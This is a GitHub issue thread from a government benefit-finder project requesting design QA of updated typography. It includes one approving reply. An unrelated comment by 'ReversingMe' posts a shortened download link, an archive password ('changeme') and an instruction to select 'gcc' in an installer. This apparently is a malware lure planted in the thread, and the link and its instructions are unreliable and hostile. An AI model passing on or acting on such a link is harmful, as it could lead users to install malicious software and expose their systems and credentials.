### ISSUE TITLE
DESIGN QA | Updated Typography

### ISSUE THREAD

**Issue by scottqueen-bixal** [GSA/px-benefit-finder#1733]
### Domain

design

### Related Issue(s)

New issues that arise from this task should be created using the [Bug Report form](https://github.com/GSA/px-benefit-finder/issues/new?assignees=&labels=bug&projects=&template=bug_report_form.yml).

[DESIGN | Update Typography across application](https://github.com/GSA/px-benefit-finder/issues/1445)	https://github.com/GSA/px-benefit-finder/issues/1445

### Description

Due: 9/4
Testing Environment: https://bf-cms-dev.bxdev.net/benefit-finder/death

Typography across benefit finder app views has been updated based on style characteristics recommended by the latest design revisions. Please review for accuracy.

**Comment by ReversingMe** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by ErnestoFernandezAlvarez** [comment]
@scottqueen-bixal @fongcindy  The executed type scale looks great!
I don't have any specific call outs. When we have final screens laid out or any changes we could revisit.
